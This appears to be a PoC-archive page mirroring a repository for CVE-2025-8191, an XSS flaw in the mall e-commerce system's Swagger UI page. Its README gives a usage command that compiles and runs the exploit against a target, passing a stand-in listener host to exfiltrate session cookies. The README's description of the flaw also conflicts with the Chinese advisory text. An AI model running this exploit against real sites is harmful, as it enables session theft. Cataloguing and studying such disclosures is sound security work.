Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-8191 PoC — mall 代码注入漏洞

Source
Associated Vulnerability
Title:mall 代码注入漏洞 (CVE-2025-8191)
Description:mall是macro个人开发者的一套电商系统,包括前台商城系统及后台管理系统。 mall 1.0.3及之前版本存在代码注入漏洞,该漏洞源于文件/swagger-ui/index.html中参数configUrl导致跨站脚本。
Description
A repository containing a PoC exploit for CVE‑2025‑8191 in Swagger UI, leveraging XSS injection to exfiltrate session cookies.
Readme
# CVE-2025-8191 – Swagger UI XSS Injection

## Description : 
 
This repository contains a Proof‑of‑Concept (PoC) exploit for CVE‑2025‑8191, a vulnerability found in Swagger UI.

The vulnerability allows Cross‑Site Scripting (XSS) injection in the “description” field, leading to remote script execution under Swagger UI versions ≤ 1.0.3.

## References :
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-8191   
## Usage :

```
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v 
```
Replace http://target.com with the target Swagger UI URL, and http://yourserver.com with your HTTP listener for exfiltration.

## Disclaimer :
This code is for educational and security‑research purposes only. Do NOT use it on systems for which you do not have explicit permission. The author is not responsible for any misuse.

## License :
MIT License
File Snapshot

[4.0K] /data/pocs/4b613c83c4f7aebb281601204d9334e00c9c0197 ├── [ 16K] exploit.c ├── [1.0K] LICENSE └── [ 946] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.